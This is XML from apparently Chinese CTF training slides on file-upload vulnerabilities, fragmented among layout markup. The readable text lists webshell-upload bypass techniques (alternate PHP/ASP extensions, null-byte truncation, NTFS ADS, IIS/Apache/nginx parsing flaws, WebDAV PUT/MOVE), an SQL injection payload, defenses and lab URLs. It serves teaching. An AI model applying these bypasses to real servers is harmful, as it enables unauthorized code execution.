            <a:ext cx="27495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44" name="燕尾形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2114550" y="3703638"/>
            <a:ext cx="477838" cy="563562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燕尾形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2030413" y="3946525"/>
            <a:ext cx="642937" cy="75565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任意多边形 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="1368425" y="1984375"/>
            <a:ext cx="1963738" cy="1528763"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 1964209"/>
              <a:gd name="txT" fmla="*/ 0 h 1529279"/>
              <a:gd name="txR" fmla="*/ 1964209 w 1964209"/>
              <a:gd name="txB" fmla="*/ 1529279 h 1529279"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="1962793" y="763865"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="1527728"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1525706"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1527727"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1527727"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1185039"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1185039"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1183924"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="1185040"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1594619" y="763865"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="343804"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="2024"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1962793" y="763865"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="1964209" h="1529279">
                <a:moveTo>
                  <a:pt x="1964209" y="764640"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1964209" y="1186938"/>
                  <a:pt x="1621868" y="1529279"/>
                  <a:pt x="1199570" y="1529279"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1527254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1185126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174164" y="1186243"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1407009" y="1186243"/>
                  <a:pt x="1595768" y="997484"/>
                  <a:pt x="1595768" y="764639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1595768" y="531793"/>
                  <a:pt x="1407009" y="343035"/>
                  <a:pt x="1174164" y="343035"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1163084" y="344152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="2027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199570" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1621868" y="0"/>
                  <a:pt x="1964209" y="342341"/>
                  <a:pt x="1964209" y="764640"/>
                </a:cubicBez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7" name="任意多边形 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="3846513" y="1973263"/>
            <a:ext cx="1963737" cy="1530350"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 1964209"/>
              <a:gd name="txT" fmla="*/ 0 h 1529279"/>
              <a:gd name="txR" fmla="*/ 1964209 w 1964209"/>
              <a:gd name="txB" fmla="*/ 1529279 h 1529279"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="1962793" y="766248"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="1532495"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1530465"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1532493"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1532493"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1188736"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1188736"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1187618"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="1188737"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1594619" y="766246"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="344875"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="2030"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1962793" y="766248"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="1964209" h="1529279">
                <a:moveTo>
                  <a:pt x="1964209" y="764640"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1964209" y="1186938"/>
                  <a:pt x="1621868" y="1529279"/>
                  <a:pt x="1199570" y="1529279"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1527254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1185126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174164" y="1186243"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1407009" y="1186243"/>
                  <a:pt x="1595768" y="997484"/>
                  <a:pt x="1595768" y="764639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1595768" y="531793"/>
                  <a:pt x="1407009" y="343035"/>
                  <a:pt x="1174164" y="343035"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1163084" y="344152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="2027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199570" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1621868" y="0"/>
                  <a:pt x="1964209" y="342341"/>
                  <a:pt x="1964209" y="764640"/>
                </a:cubicBez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8" name="任意多边形 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6324600" y="1998663"/>
            <a:ext cx="1965325" cy="1528762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 1964209"/>
              <a:gd name="txT" fmla="*/ 0 h 1529279"/>
              <a:gd name="txR" fmla="*/ 1964209 w 1964209"/>
              <a:gd name="txB" fmla="*/ 1529279 h 1529279"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="1967559" y="763866"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1201617" y="1527731"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1181486" y="1525709"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1181486" y="1527730"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1527730"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1185042"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1165068" y="1185042"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1165068" y="1183927"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1176167" y="1185043"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1598490" y="763865"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1176167" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1165068" y="343804"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1165068" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1181486" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1181486" y="2024"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1201617" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1967559" y="763866"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="1964209" h="1529279">
                <a:moveTo>
                  <a:pt x="1964209" y="764640"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1964209" y="1186938"/>
                  <a:pt x="1621868" y="1529279"/>
                  <a:pt x="1199570" y="1529279"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1527254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1185126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174164" y="1186243"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1407009" y="1186243"/>
                  <a:pt x="1595768" y="997484"/>
                  <a:pt x="1595768" y="764639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1595768" y="531793"/>
                  <a:pt x="1407009" y="343035"/>
                  <a:pt x="1174164" y="343035"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1163084" y="344152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="2027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199570" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1621868" y="0"/>
                  <a:pt x="1964209" y="342341"/>
                  <a:pt x="1964209" y="764640"/>
                </a:cubicBez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9" name="任意多边形 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="8837613" y="1973263"/>
            <a:ext cx="1963737" cy="1530350"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 1964209"/>
              <a:gd name="txT" fmla="*/ 0 h 1529279"/>
              <a:gd name="txR" fmla="*/ 1964209 w 1964209"/>
              <a:gd name="txB" fmla="*/ 1529279 h 1529279"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="1962793" y="766248"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="1532495"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1530465"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1532493"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1532493"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1188736"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1188736"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1187618"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="1188737"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1594619" y="766246"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="344875"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="2030"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1962793" y="766248"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="1964209" h="1529279">
                <a:moveTo>
                  <a:pt x="1964209" y="764640"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1964209" y="1186938"/>
                  <a:pt x="1621868" y="1529279"/>
                  <a:pt x="1199570" y="1529279"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1527254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1185126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174164" y="1186243"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1407009" y="1186243"/>
                  <a:pt x="1595768" y="997484"/>
                  <a:pt x="1595768" y="764639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1595768" y="531793"/>
                  <a:pt x="1407009" y="343035"/>
                  <a:pt x="1174164" y="343035"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1163084" y="344152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="2027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199570" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1621868" y="0"/>
                  <a:pt x="1964209" y="342341"/>
                  <a:pt x="1964209" y="764640"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0F2437">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="284D7A">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0F2437">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
            <a:tileRect/>
          </a:gra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50" name="文本框 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1531938" y="5048250"/>
            <a:ext cx="171450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文件上传介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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51" name="燕尾形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4611688" y="3703638"/>
            <a:ext cx="477837" cy="563562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2" name="燕尾形 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4529138" y="3946525"/>
            <a:ext cx="642937" cy="75565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3" name="文本框 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4106863" y="5048250"/>
            <a:ext cx="145923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绕过黑名单</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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54" name="燕尾形 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7075488" y="3703638"/>
            <a:ext cx="477837" cy="563562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5" name="燕尾形 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6991350" y="3946525"/>
            <a:ext cx="642938" cy="75565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6" name="文本框 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6584315" y="5048250"/>
            <a:ext cx="145923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绕过白名单</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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57" name="燕尾形 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9599613" y="3703638"/>
            <a:ext cx="477837" cy="563562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8" name="燕尾形 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9517063" y="3946525"/>
            <a:ext cx="642937" cy="75565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0F2437"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="284D7A"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0F2437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9" name="文本框 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8788400" y="5048250"/>
            <a:ext cx="2225040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solidFill>
                  <a:srgbClr val="0C0C0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防御文件上传攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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0260" name="文本框 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2047875" y="2441575"/>
            <a:ext cx="60642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sz="3600" dirty="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261" name="文本框 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4511675" y="2441575"/>
            <a:ext cx="6635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sz="3600" dirty="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262" name="文本框 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6994525" y="2447925"/>
            <a:ext cx="676275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zh-CN" altLang="en-US" sz="3600" dirty="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263" name="文本框 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9499600" y="2447925"/>
            <a:ext cx="661988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04</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="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2" name="图片 1" descr="XCTFb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用户上传一个可执行的脚本文件，获得了执行服务器端命令的能力。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getshell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最为常用、直接的方式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文件上传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本身是一个正常的业务需求，问题在于如何安全的上传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文件上传漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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0" lvl="1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上传的文件被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容器解释执行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用户能够从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网页访问到被上传的文件（直接或间接）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用户上传的文件通常不能被网站程序压缩、修改内容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触发条件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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很多上传点依赖于对访问上传页面的访问权限控制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一旦上传页面暴露，直接就可以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getshell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直接上传一句话</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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" y="2517140"/>
            <a:ext cx="9253220" cy="3660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61710" y="4919980"/>
            <a:ext cx="37388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最基本的文件上传代码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客户端javascript校验（通常校验扩展名）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检查文件扩展名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*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检查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MIME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类型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随机文件名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*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隐藏路径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*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重写内容（影响效率）imagecreatefromjpeg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...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 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检查内容是否合法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防御文件上传</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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在浏览加载文件，但还未点击上传按钮时便弹出对话框，内容如：只允许上传.jpg/.jpeg/.png后缀名的文件，而此时并没有发送数据包。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抓包改包轻松绕过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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户端javascript校验</a:t>
            </a:r>
            <a:endParaRPr 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SQL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注入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$user = admin' or 1=1#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脚本语言无法理解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语句，两者对查询语句处理不一致导致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注入，篡改了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语句原本逻辑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5" y="1691005"/>
            <a:ext cx="11364595" cy="1361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05" y="4030345"/>
            <a:ext cx="11364595" cy="5975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客户端判断：$_FILES['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my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file']['type']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== 'image/jpeg'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服务端判断：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非常容易欺骗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....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检测</a:t>
            </a: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MIME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类型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" y="3435985"/>
            <a:ext cx="9398000" cy="7804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看上去很有效，但是，只要是黑名单方法，就不那么可靠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检查内容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" y="2710180"/>
            <a:ext cx="8185785" cy="15297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移到一个不为人知的路径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受到业务需求的限制，比如头像必须要被访问到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隐藏路径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" y="2580005"/>
            <a:ext cx="7722870" cy="17278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$file_true_name=md5(rand(1,1000)).$_FILES['myfile']['name'];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受到业务需求的限制，比如头像必须要被访问到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随机文件名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最直接有效的方法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服务器根据文件扩展名来选择不同的方式解析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可以使用白名单和黑名单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检查文件扩展名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绕过？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php3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php5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phtml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phtm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jsp jspx jspf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asp asa cer aspx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exe exee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黑名单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" y="2085975"/>
            <a:ext cx="8876030" cy="18719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能绕过白名单的方法也能绕过黑名单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白名单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80995"/>
            <a:ext cx="11353800" cy="13931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配合文件包含漏洞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截断绕过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利用NTFS ADS特性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配合服务器解析漏洞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配合CMS、编辑器漏洞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白名单绕过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test.php(0x00).jpg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截断绕过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" y="2533650"/>
            <a:ext cx="10488930" cy="2997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ADS是NTFS磁盘格式的一个特性，用于NTFS交换数据流。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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用NTFS ADS特性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895" y="2509520"/>
            <a:ext cx="9142095" cy="42119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SQL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注入类型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Union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注入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报错注入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Boolean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盲注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Timing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盲注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使用iis5.x-6.x版本的服务器，大多为windows server 2003，网站比较古老，开发语句一般为asp；该解析漏洞也只能解析asp文件，而不能解析aspx文件。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目录解析(6.0)，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www.xxx.com/xx.asp/xx.jpg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xx.asp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要存在）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www.xxx.com/xx.asp;.jpg   服务器默认不解析;号后面的内容，因此xx.asp;.jpg便被解析成asp文件了。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xx.asp;.jpg为上传文件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IIS5.x-6.x解析漏洞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PUT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是在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WebDav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中定义的一个方法，允许用户上传文件到指定目录。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在许多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WebServer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中都默认禁用了此方法，或者对上传做了严格限制。但在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IIS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中，如果目录支持写权限，同时开启了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WebDav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，就会支持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PUT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，再结合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MOVE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方法，可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Getshell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IIS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的</a:t>
            </a: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PUT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上传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Step1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：通过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Options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探测服务器信息。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IIS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的</a:t>
            </a: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PUT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上传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" y="2073910"/>
            <a:ext cx="6117590" cy="43840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Step2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：上传文件。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IIS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的</a:t>
            </a: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PUT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上传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" y="1962785"/>
            <a:ext cx="7015480" cy="46348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Step3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：通过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MOVE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改名。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IIS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的</a:t>
            </a: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PUT</a:t>
            </a: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上传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" y="2001520"/>
            <a:ext cx="4763770" cy="47637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Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把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test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.php.owf.rar解析成php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www.xxxx.xxx.com/test.php.php123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Apache的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httpd.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conf的AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。（配置错误）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apache解析漏洞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22960" y="1474470"/>
            <a:ext cx="10515600" cy="4702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20000"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800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cgi.fix_pathinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开启时（为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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr 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当访问www.xx.com/phpinfo.jpg/1.php时，会将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phpinfo.jpg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当做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php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进行解析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其中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1.php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是一个不存在的文件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0" y="226060"/>
            <a:ext cx="2124710" cy="31496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965200" y="4997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nginx解析漏洞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练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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http://58.154.33.13:800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4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http://lab10.wargame.whitehat.vn/web007/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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alt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Have Fun</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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Union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4400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有回显，可以看到某些字段的回显结果（通常）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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>猜解出字段数目</a:t>
            </a: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zh-CN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最方便的注入方式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Union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语句可以填充查询结果，并且额外执行一次查询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lvl="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91AB71-6BDD-4EA3-A396-C671FDC32B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XCT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35" y="240030"/>
            <a:ext cx="2005965" cy="287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2437"/>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="284D7A"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0F243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4578" name="六边形 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3856038" y="1855788"/>
            <a:ext cx="4508500" cy="3887787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D8D8D8"/>
          </a:solidFill>
          <a:ln w="1016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79" name="文本框 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5119370" y="4264025"/>
            <a:ext cx="210566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sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284D7A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rPr>
              <a:t>thanks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="284D7A"/>
              </a:solidFill>
              <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
